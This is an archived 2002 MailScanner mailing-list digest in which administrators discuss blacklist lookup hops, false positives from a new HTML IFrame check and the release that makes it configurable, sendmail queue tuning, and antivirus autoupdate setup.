[mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Tuesday, September 24, 2002 6:39 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: [Mailscanner] SpamCop IP's Apparently Mailscanner does not look at all the IP's when doing black hole lookups? I just got a piece of SPAM that was not tagged? Looked at the headers and the most recent hop before my server was not listed but the one before that was. Is there anyway to get Mailscanner to scan all the IP's in the headers except my own? Matt From hciss at HCIWS.COM Wed Sep 25 00:50:19 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's References: Message-ID: <00a201c26425$27438860$6701a8c0@matthew> > Is bl.spamcop the only blacklist you use? If so, you might want to add some more...I think I'm using 5 at the MTA level. Spamcop & Ordb. It was listed in Spamcop but the most recent hop before my server was not listed. I thought that Mailscanner checked all the hops in the chain. Or perhaps it was not in yet or there was a time out. Matt From mike at CAMAROSS.NET Wed Sep 25 01:01:14 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: <00a201c26425$27438860$6701a8c0@matthew> Message-ID: I couldn't answer that one. That's one reason I stop them with sendmail rather than tagging them. One thing you might consider (if you haven't already) is use a caching (local) nameserver on your mail server. Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Tuesday, September 24, 2002 6:50 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [Mailscanner] SpamCop IP's > Is bl.spamcop the only blacklist you use? If so, you might want to add some more...I think I'm using 5 at the MTA level. Spamcop & Ordb. It was listed in Spamcop but the most recent hop before my server was not listed. I thought that Mailscanner checked all the hops in the chain. Or perhaps it was not in yet or there was a time out. Matt From hciss at HCIWS.COM Wed Sep 25 01:09:25 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's References: Message-ID: <00ae01c26427$d1ca6680$6701a8c0@matthew> > I couldn't answer that one. That's one reason I stop them with sendmail rather than tagging them. > One thing you might consider (if you haven't already) is use a caching (local) nameserver on your > mail server. I thought the blackhole lookups went right to the server or mirror and were not cached. I am not sure that caching would be a good thing. A black listed server would have to get out of the cache even after getting unlisted. I do have a local caching DNS server that I may have the webserver use in the future. Matt From mike at CAMAROSS.NET Wed Sep 25 01:28:00 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: <00ae01c26427$d1ca6680$6701a8c0@matthew> Message-ID: True, if the lookup has not been cached, it would go to the server authoritative for the zone. You should be able to control the length of time the cache is valid for though. For the most part, I have added entries to my /etc/mail/access file to allow servers that I know have been blacklisted, but for one reason or another, I must allow mail to flow from. On a very rare occasion, I have to add an entry, but it's on the order of once a month or less. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Tuesday, September 24, 2002 7:09 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: [Mailscanner] SpamCop IP's > I couldn't answer that one. That's one reason I stop them with sendmail rather than tagging them. > One thing you might consider (if you haven't already) is use a caching (local) nameserver on your > mail server. I thought the blackhole lookups went right to the server or mirror and were not cached. I am not sure that caching would be a good thing. A black listed server would have to get out of the cache even after getting unlisted. I do have a local caching DNS server that I may have the webserver use in the future. Matt From jim at ENTROPHY-FREE.NET Wed Sep 25 01:21:01 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: <008c01c26423$912d6720$6701a8c0@matthew> References: <008c01c26423$912d6720$6701a8c0@matthew> Message-ID: <1032913262.28711.16.camel@chaos.entrophy-free.net> On Tue, 2002-09-24 at 18:38, Matt wrote: > Apparently Mailscanner does not look at all the IP's when doing black hole > lookups? I just got a piece of SPAM that was not tagged? Looked at the > headers and the most recent hop before my server was not listed but the one > before that was. Is there anyway to get Mailscanner to scan all the IP's in > the headers except my own? > While it may seem attractive, it's not a good idea to check all of the hops that a message takes, especially if you use MAPS-DUL or MAPS-RBL+. Doing so will cause legitimate email to be rejected. As an example I happen to use an ADSL provider that is a good net citizen and they list the IP's of all of their non-commercial customers in the dial-up list at MAPS. I also happen to run my own mail server and to avoid running afoul of the MAPS list I relay all outbound mail through a mail server that isn't on the list. If a recipient were to check all of the hops I, and others like me, would have their mail blocked, even though I'm doing all of the right things and for all of the right reasons. It does make sense to check the first relaying MTA that isn't one of your designated relays, like when you have a mail relay outside of a firewall or when you have an upstream provider that relays all of your mail. I use a modified MailScanner that does exactly that. It knows the IP's of my relay systems, which will always the the last hop before the MailScanner system, and skips those causing the ip of the hop before the relay servers to be checked. -- The instructions said to use Windows 98 or better, so I installed RedHat. From siewwu.tan at EDGEMATRIX.COM Wed Sep 25 03:15:47 2002 From: siewwu.tan at EDGEMATRIX.COM (Tan Siew Wu) Date: Thu Jan 12 21:15:46 2006 Subject: Problem with "Possible Microsoft security vulnerability attack" detection on version 3.23-1?? Message-ID: <200209250215.g8P2Flr08350@ori.rl.ac.uk> Hi all, I just upgraded to 3.23-1 two days ago. Everything is working fine except that there are unusual amount of detection on "Possible Microsoft security vulnerability attack". I was on 3.21-1 and guess this was not part of the feature. A brief check indicates that all came from a number of mailing lists that my users subscribe to. Examples like Daily Dilbert list, Oracle list,CNet news.com list...etc. I haven't had time to try to dive into the detection perl code for it and is wondering if someone facing the similar issue. From what I see, the is not configurable option on mailscanner.conf to control this new detection behaviour. Currently configured to keep whole infected message. If someone wants to take a look at these messages, I can collect a few of them and email it. Siew Wu From tlyons at digitalvoodoo.org Wed Sep 25 03:43:09 2002 From: tlyons at digitalvoodoo.org (Tim Lyons) Date: Thu Jan 12 21:15:46 2006 Subject: Problem with "Possible Microsoft security vulnerability attack" detection on version 3.23-1?? In-Reply-To: <200209250215.g8P2Flr08350@ori.rl.ac.uk> References: <200209250215.g8P2Flr08350@ori.rl.ac.uk> Message-ID: <200209242243.09186.tlyons@digitalvoodoo.org> Funny you should bring that up now as I was just delving into that issue myself as quite a few users are "miffed" to say the least. Email from sites such as HoustonChronicls, WSJ, and numerous others are now unable to get through. Is this the expected behavior with the new mods? If so, what's the best way to work this? --Tim On Tuesday 24 September 2002 22:15, you wrote: > Hi all, > I just upgraded to 3.23-1 two days ago. Everything is working fine except > that there are unusual amount of detection on "Possible Microsoft security > vulnerability attack". I was on 3.21-1 and guess this was not part of the > feature. > > A brief check indicates that all came from a number of mailing lists that > my users subscribe to. Examples like Daily Dilbert list, Oracle list,CNet > news.com list...etc. > > I haven't had time to try to dive into the detection perl code for it and > is wondering if someone facing the similar issue. From what I see, the is > not configurable option on mailscanner.conf to control this new detection > behaviour. > > Currently configured to keep whole infected message. If someone wants to > take a look at these messages, I can collect a few of them and email it. > > Siew Wu From hciss at HCIWS.COM Wed Sep 25 05:38:49 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's References: <008c01c26423$912d6720$6701a8c0@matthew> <1032913262.28711.16.camel@chaos.entrophy-free.net> Message-ID: <005501c2644d$74b1bd60$6401a8c0@matthewmpqowmc> > While it may seem attractive, it's not a good idea to check all of the > hops that a message takes, especially if you use MAPS-DUL or MAPS-RBL+. MAPS-DUL should not be used on all the hops. > Doing so will cause legitimate email to be rejected. As an example I > happen to use an ADSL provider that is a good net citizen and they list > the IP's of all of their non-commercial customers in the dial-up list at > MAPS. I also happen to run my own mail server and to avoid running afoul > of the MAPS list I relay all outbound mail through a mail server that > isn't on the list. If a recipient were to check all of the hops I, and And if your Mailserver does not get listed on any other lists the only issue is the DUL list. I just do not like the idea of a SPAMMER hiding behind there ISP's mailserver. Sure, the ISP should/will shut them down but in the mean time we must tolerate there SPAM. If there IP is assocated with ton's of SPAM and relatively little legitimate email it will be black listed without shuting down the ISP's server. All I know is I want the spam to stop/slow and one of the IP's in this last SPAM was listed in bl.spamcop.net. Since it was not the last IP hop the message was not tagged. Spamcop does not block the DUL list either. The downfall I see is the delay it would take to scan all IP's in the chain. SPAMcop currently does this on there accounts. But why wouldn't they, they have the list right there. Matt > others like me, would have their mail blocked, even though I'm doing all > of the right things and for all of the right reasons. > > It does make sense to check the first relaying MTA that isn't one of > your designated relays, like when you have a mail relay outside of a > firewall or when you have an upstream provider that relays all of your > mail. I use a modified MailScanner that does exactly that. It knows the > IP's of my relay systems, which will always the the last hop before the > MailScanner system, and skips those causing the ip of the hop before the > relay servers to be checked. > -- > The instructions said to use Windows 98 or better, so I installed > RedHat. > > From munafo at PREZZEMOLO.POLITO.IT Wed Sep 25 07:55:01 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:46 2006 Subject: Problem with "Possible Microsoft security vulnerability attack" detection on version 3.23-1?? In-Reply-To: <200209250215.g8P2Flr08350@ori.rl.ac.uk> References: <200209250215.g8P2Flr08350@ori.rl.ac.uk> Message-ID: <02092508550101.25518@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday 25 September 2002 04:15, Tan Siew Wu wrote: > Hi all, > I just upgraded to 3.23-1 two days ago. Everything is working fine except > that there are unusual amount of detection on "Possible Microsoft security > vulnerability attack". I was on 3.21-1 and guess this was not part of the > feature. > > A brief check indicates that all came from a number of mailing lists that > my users subscribe to. Examples like Daily Dilbert list, Oracle list,CNet > news.com list...etc. > 3.23-1 blocks any HTML message containing the iframe tag. This means that almost any mailing list message in HTML format containing an ad banner is blocked. I'm going to test 3.23-2 in a few minutes to see if this behaviour is still there, but I think it is, since it is one of the GFI tests recently introduced. Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kV3FtgCCNnfQWWkRArjUAJ94ydmTJRZeqeB1uI0S4rBOsHzEPQCePgr4 fvXYRz2k42vtDJfSwDLoaFc= =XAKq -----END PGP SIGNATURE----- From glynn at MAKATI.TECHSQUARE.COM Wed Sep 25 07:59:35 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> Message-ID: <037601c26461$1b708740$8201a8c0@proaccessph.com> Hi chris, Thats what I have experienced before but when I tried to upgrade my version to 3.32.1, wow it so fast. --- Glynn --- ----- Original Message ----- From: "Chris Waltham" To: Sent: Wednesday, September 25, 2002 1:52 PM Subject: Increasing MailScanner performance > Hi guys, > > I've got a Linux box (kernel 2.2.19) with dual P3-700s and 512MB of RAM. > We're a small software company (with some web hosting & email stuff thrown > in), around 40 or 50 souls working here. I've noticed that messages sent > through MailScanner have started to take longer and longer to come through, > and some [l]users today have called up and whined to me about it. > > What can I do to improve my performance? If I go into /var/spool/mqueue.in > I get this: > > root@xxx:/var/spool/mqueue.in# ls | wc -l > 342 > > I'm running MailScanner 3.20-4 and SpamAssassin 2.20 (I think!), and if it > matters the POP3 daemon I'm using is cucipop. Loads on the machine are > generally pretty low, around 0.05-0.10, though it's been as high as 0.40 > today. We're scanning the emails with Sophos 3.57. Oh, I should say we're > using Sendmail too (8.11.2). > > Here are some lines from my MailScanner config, let me know if you want to > see more: > > Delivery Method = batch > Deliver In Background = yes > > Judging from this page > (http://www.sng.ecs.soton.ac.uk/mailscanner/faq.shtml) I should try setting > Delivery Method to "queue". Our DNS is fine, though. Any ideas? > > Here's how I'm starting my Sendmail: > > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd > -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in)..." > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly > -OQueueDirectory=/var/spool/mqueue.in > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q5m)..." > /usr/sbin/sendmail -q5m > > thanks guys, > > > Chris > > -- > Chris Waltham > Systems Administrator > HarvestRoad, Limited. > chris@harvestroad.com > phone: (08) 9338-3000 > From glynn at MAKATI.TECHSQUARE.COM Wed Sep 25 08:02:01 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> <037601c26461$1b708740$8201a8c0@proaccessph.com> Message-ID: <038201c26461$72d06320$8201a8c0@proaccessph.com> Sorry version 3.23.1 I mean. --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Wednesday, September 25, 2002 2:59 PM Subject: Re: Increasing MailScanner performance > Hi chris, > > Thats what I have experienced before but when I tried to upgrade my version > to 3.32.1, wow it so fast. > > --- Glynn --- > > > ----- Original Message ----- > From: "Chris Waltham" > To: > Sent: Wednesday, September 25, 2002 1:52 PM > Subject: Increasing MailScanner performance > > > > Hi guys, > > > > I've got a Linux box (kernel 2.2.19) with dual P3-700s and 512MB of RAM. > > We're a small software company (with some web hosting & email stuff thrown > > in), around 40 or 50 souls working here. I've noticed that messages sent > > through MailScanner have started to take longer and longer to come > through, > > and some [l]users today have called up and whined to me about it. > > > > What can I do to improve my performance? If I go into /var/spool/mqueue.in > > I get this: > > > > root@xxx:/var/spool/mqueue.in# ls | wc -l > > 342 > > > > I'm running MailScanner 3.20-4 and SpamAssassin 2.20 (I think!), and if it > > matters the POP3 daemon I'm using is cucipop. Loads on the machine are > > generally pretty low, around 0.05-0.10, though it's been as high as 0.40 > > today. We're scanning the emails with Sophos 3.57. Oh, I should say we're > > using Sendmail too (8.11.2). > > > > Here are some lines from my MailScanner config, let me know if you want to > > see more: > > > > Delivery Method = batch > > Deliver In Background = yes > > > > Judging from this page > > (http://www.sng.ecs.soton.ac.uk/mailscanner/faq.shtml) I should try > setting > > Delivery Method to "queue". Our DNS is fine, though. Any ideas? > > > > Here's how I'm starting my Sendmail: > > > > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd > > -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in)..." > > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly > > -OQueueDirectory=/var/spool/mqueue.in > > echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q5m)..." > > /usr/sbin/sendmail -q5m > > > > thanks guys, > > > > > > Chris > > > > -- > > Chris Waltham > > Systems Administrator > > HarvestRoad, Limited. > > chris@harvestroad.com > > phone: (08) 9338-3000 > > > From chris at HARVESTROAD.COM Wed Sep 25 08:08:08 2002 From: chris at HARVESTROAD.COM (Chris Waltham) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance In-Reply-To: <037601c26461$1b708740$8201a8c0@proaccessph.com> References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> Message-ID: <5.1.0.14.2.20020925150631.01da36e8@mail.harvestroad.com> Hi Glynn, >Thats what I have experienced before but when I tried to upgrade my version >to 3.32.1, wow it so fast. Hrm, I'll give it a try.. there are still 275 files in the mqueue directory, though. :( Is there a way I can "force" sendmail to process the queue? Running sendmail -bp shows around 120 messages queued.. :| Chris From raymond at PROLOCATION.NET Wed Sep 25 08:15:10 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:46 2006 Subject: Problem with "Possible Microsoft security vulnerability attack" detection on version 3.23-1?? In-Reply-To: <200209242243.09186.tlyons@digitalvoodoo.org> Message-ID: Hi! > Funny you should bring that up now as I was just delving into that issue > myself as quite a few users are "miffed" to say the least. Email from sites > such as HoustonChronicls, WSJ, and numerous others are now unable to get > through. I have seen the same with 'legit' postings from for example the Tucows mailinglist. Somthing is too tight right now i guess :) Bye, Raymond. From glynn at MAKATI.TECHSQUARE.COM Wed Sep 25 08:21:34 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> <5.1.0.14.2.20020925150631.01da36e8@mail.harvestroad.com> Message-ID: <039501c26464$2df67930$8201a8c0@proaccessph.com> one thing I remember, move the queued files from mqueue.in to mqueue and disabling the mailscanner and what for the sendmail to send all the mqueued mail and start mailscanner again. --- Glynn --- ----- Original Message ----- From: "Chris Waltham" To: Sent: Wednesday, September 25, 2002 3:08 PM Subject: Re: Increasing MailScanner performance > Hi Glynn, > > >Thats what I have experienced before but when I tried to upgrade my version > >to 3.32.1, wow it so fast. > > Hrm, I'll give it a try.. there are still 275 files in the mqueue > directory, though. :( Is there a way I can "force" sendmail to process the > queue? Running sendmail -bp shows around 120 messages queued.. :| > > > Chris > From chris at HARVESTROAD.COM Wed Sep 25 08:27:33 2002 From: chris at HARVESTROAD.COM (Chris Waltham) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance In-Reply-To: <039501c26464$2df67930$8201a8c0@proaccessph.com> References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> <5.1.0.14.2.20020925150631.01da36e8@mail.harvestroad.com> Message-ID: <5.1.0.14.2.20020925152647.0584e578@mail.harvestroad.com> >one thing I remember, move the queued files from mqueue.in to mqueue and >disabling the mailscanner and what for the sendmail to send all the mqueued >mail and start mailscanner again. Yeah, I've done that. The mail queue has gone from 200-odd to about 18 or so, in around 15 minutes. Would changing sendmail from -q15m to -q5m speed this up? Once the queue is gone, I'll install the latest MailScanner and get it running again. Chris "This job would be great, if it weren't for the users.." From andersan at LTKALMAR.SE Wed Sep 25 08:44:48 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:46 2006 Subject: SV: Last news...... Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB53@lkl22.ltkalmar.se> I'll do that when its installed =) /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 24 september 2002 19:25 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: Last news...... > > > At 18:05 24/09/2002, you wrote: > >Hi > >Just thought I should tell you that my boss was impressed so > >asap I get new hardware where implementing MS at work. > > > >So thanks from me to Julian and all the others that > >done this nice app... > > Please can you add something to the guest book if you haven't > already... :-) > > Thanks! > Jules. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 00:30:45 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: raunn@VOLTERRA.COM requested to join Message-ID: <200209242330.AAA12559@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 00:30:45 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Raun Nohavitza . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER raunn@VOLTERRA.COM Raun Nohavitza The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+raunn%40VOLTERRA.COM+Raun+Nohavitza&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Wed, 25 Sep 2002 00:30:45 +0100 Received: from EXCHANGE.volterra.com (firewall.volterra.com [209.101.17.254]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8ONUgr30998 for ; Wed, 25 Sep 2002 00:30:42 +0100 MIME-Version: 1.0 Subject: RE: Command confirmation request (131CC359) X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0 Date: Tue, 24 Sep 2002 16:30:42 -0700 Message-ID: <964CA0B7D3D2B94CA24918FC3A5C789501E6C7@EXCHANGE.volterra.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Command confirmation request (131CC359) Thread-Index: AcJkIlUlBbJUyw2CQsq8D+QAT9BD5AAAA5Tg From: "Raun Nohavitza" To: "L-Soft list server at JISCMAIL (1.8e)" X-LSVline1: ok From chris at HARVESTROAD.COM Wed Sep 25 06:52:44 2002 From: chris at HARVESTROAD.COM (Chris Waltham) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance Message-ID: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> Hi guys, I've got a Linux box (kernel 2.2.19) with dual P3-700s and 512MB of RAM. We're a small software company (with some web hosting & email stuff thrown in), around 40 or 50 souls working here. I've noticed that messages sent through MailScanner have started to take longer and longer to come through, and some [l]users today have called up and whined to me about it. What can I do to improve my performance? If I go into /var/spool/mqueue.in I get this: root@xxx:/var/spool/mqueue.in# ls | wc -l 342 I'm running MailScanner 3.20-4 and SpamAssassin 2.20 (I think!), and if it matters the POP3 daemon I'm using is cucipop. Loads on the machine are generally pretty low, around 0.05-0.10, though it's been as high as 0.40 today. We're scanning the emails with Sophos 3.57. Oh, I should say we're using Sendmail too (8.11.2). Here are some lines from my MailScanner config, let me know if you want to see more: Delivery Method = batch Deliver In Background = yes Judging from this page (http://www.sng.ecs.soton.ac.uk/mailscanner/faq.shtml) I should try setting Delivery Method to "queue". Our DNS is fine, though. Any ideas? Here's how I'm starting my Sendmail: echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -ODeliveryMode=queueonly \ -OQueueDirectory=/var/spool/mqueue.in)..." /usr/sbin/sendmail -bd -ODeliveryMode=queueonly -OQueueDirectory=/var/spool/mqueue.in echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q5m)..." /usr/sbin/sendmail -q5m thanks guys, Chris -- Chris Waltham Systems Administrator HarvestRoad, Limited. chris@harvestroad.com phone: (08) 9338-3000 From glynn at MAKATI.TECHSQUARE.COM Wed Sep 25 09:10:04 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance References: <5.1.0.14.2.20020925134243.03434b58@mail.harvestroad.com> <5.1.0.14.2.20020925150631.01da36e8@mail.harvestroad.com> <5.1.0.14.2.20020925152647.0584e578@mail.harvestroad.com> Message-ID: <039f01c2646a$f41eded0$8201a8c0@proaccessph.com> Yes, changing -q15m to -q5m woudld help. I also did -q1m :) Try upgrading mailscanner and observe if the process still the same. --- Glynn --- ----- Original Message ----- From: "Chris Waltham" To: Sent: Wednesday, September 25, 2002 3:27 PM Subject: Re: Increasing MailScanner performance > >one thing I remember, move the queued files from mqueue.in to mqueue and > >disabling the mailscanner and what for the sendmail to send all the mqueued > >mail and start mailscanner again. > > Yeah, I've done that. The mail queue has gone from 200-odd to about 18 or > so, in around 15 minutes. Would changing sendmail from -q15m to -q5m speed > this up? > > Once the queue is gone, I'll install the latest MailScanner and get it > running again. > > > Chris > "This job would be great, if it weren't for the users.." > From LISTSERV at JISCMAIL.AC.UK Wed Sep 25 09:30:02 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:46 2006 Subject: MAILSCANNER: ben.tullis@INFOMATRIX.COM left the list Message-ID: <200209250830.JAA21010@magpie.ecs.soton.ac.uk> Wed, 25 Sep 2002 09:30:02 Ben Tullis has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Wed Sep 25 11:40:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: ANNOUNCE: Version 3.23-3 released Message-ID: <5.1.0.14.2.20020925113745.033c1980@imap.ecs.soton.ac.uk> I have just released 3.23-3. As the HTML IFrame tag check is causing some problems on HTML mailing lists, I have added a configuration option to switch this check on and off. If it is causing trouble, set Allow IFrame Tags = yes I have also just released 4.00.0a6 which incorporates the same switch. However, as the switch can be the filename of a ruleset, you can control exactly which addresses you trust to generate IFrame tags. This means that you can just allow them from known HTML mailing lists and ban them from everywhere else. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 25 10:51:22 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: References: <00ae01c26427$d1ca6680$6701a8c0@matthew> Message-ID: <5.1.0.14.2.20020925104637.033fbed8@imap.ecs.soton.ac.uk> Most of this has migrated into a discussion about DNS server setups. I would advise use of a local caching DNS server as this will increase the speed of repeated lookups considerably. The DNS system already has positive and negative result cache timeouts in it, and if you aren't caching yourself, then the next DNS server upstream from you will be caching anyway. So you might as well do it on your own net and speed things up. For the reasons highlighted before (e.g. use of the DUL list, which is a list of all known IP addresses allocated to dialup lines around the world), MailScanner only uses the last hop. Anything before the last hop can be trivially faked, so there's absolutely no point wasting CPU on extracting the IP addresses from the headers and testing them. Any professional spammer will fake them anyway. At 01:28 25/09/2002, you wrote: >True, if the lookup has not been cached, it would go to the server >authoritative for the zone. You should be able to control the >length of time the cache is valid for though. For the most part, I have >added entries to my /etc/mail/access file to allow servers >that I know have been blacklisted, but for one reason or another, I must >allow mail to flow from. On a very rare occasion, I have >to add an entry, but it's on the order of once a month or less. > > > >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Matt >Sent: Tuesday, September 24, 2002 7:09 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: [Mailscanner] SpamCop IP's > > > > I couldn't answer that one. That's one reason I stop them with sendmail >rather than tagging them. > > One thing you might consider (if you haven't already) is use a caching >(local) nameserver on your > mail server. > >I thought the blackhole lookups went right to the server or mirror and were >not cached. I am not sure that caching would be a good thing. A black >listed server would have to get out of the cache even after getting >unlisted. I do have a local caching DNS server that I may have the >webserver use in the future. > >Matt -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 25 10:43:08 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: F-Prot Autoupdate In-Reply-To: <007301c2641c$5becc260$6701a8c0@matthew> References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924170947.068f5df8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020925104135.0242c5b8@imap.ecs.soton.ac.uk> At 23:47 24/09/2002, you wrote: > > >Updated F-prot to latest version and also updated Mailscanner to latest >3.x > > >release. Now it works. Is there anyway to copy it into the cron.daily > > >directory? Being a perl script it likely won't work like that? > > > > Take a look at the cron.daily sophos.autoupdate script and you'll see how > > to do it. > >I just took the autoupdate file you put in the F-Prot directory when >Mailscanner installed and put it in the cron.daily directory renamed >"autoupdate.pl". Will that work? Yes, that will work okay, but it's better to put the little wrapper around it that you will find in the other scripts in that directory. And there's not point renaming it, it won't make any difference. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 25 11:47:04 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: Problem with "Possible Microsoft security vulnerability attack" detection on version 3.23-1?? In-Reply-To: References: <200209242243.09186.tlyons@digitalvoodoo.org> Message-ID: <5.1.0.14.2.20020925114626.0232b098@imap.ecs.soton.ac.uk> At 08:15 25/09/2002, you wrote: > > Funny you should bring that up now as I was just delving into that issue > > myself as quite a few users are "miffed" to say the least. Email from > sites > > such as HoustonChronicls, WSJ, and numerous others are now unable to get > > through. > >I have seen the same with 'legit' postings from for example the Tucows >mailinglist. Somthing is too tight right now i guess :) Fixed. See 3.23-3 (and 4.00.0a6 which has a more flexible solution). -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Chris.Campbell at FAC.COM Wed Sep 25 12:36:26 2002 From: Chris.Campbell at FAC.COM (Chris Campbell) Date: Thu Jan 12 21:15:46 2006 Subject: Increasing MailScanner performance Message-ID: Chris, here is a way to run the sendmail queue manually. sendmail -oQ/var/spool/mqueue.in -q -v I have never done this in the mqueue.in dir tho, and I am not sure how well it would work. I would obviously have mailscanner off when I did this. Hope this helps? ..................................... Christopher S. Campbell UNIX Admin First Albany Corp chris.campbell@fac.com Chris Waltham cc: Sent by: Subject: Increasing MailScanner performance MailScanner mailing list 09/25/2002 01:52 AM Please respond to MailScanner mailing list Hi guys, I've got a Linux box (kernel 2.2.19) with dual P3-700s and 512MB of RAM. We're a small software company (with some web hosting & email stuff thrown in), around 40 or 50 souls working here. I've noticed that messages sent through MailScanner have started to take longer and longer to come through, and some [l]users today have called up and whined to me about it. What can I do 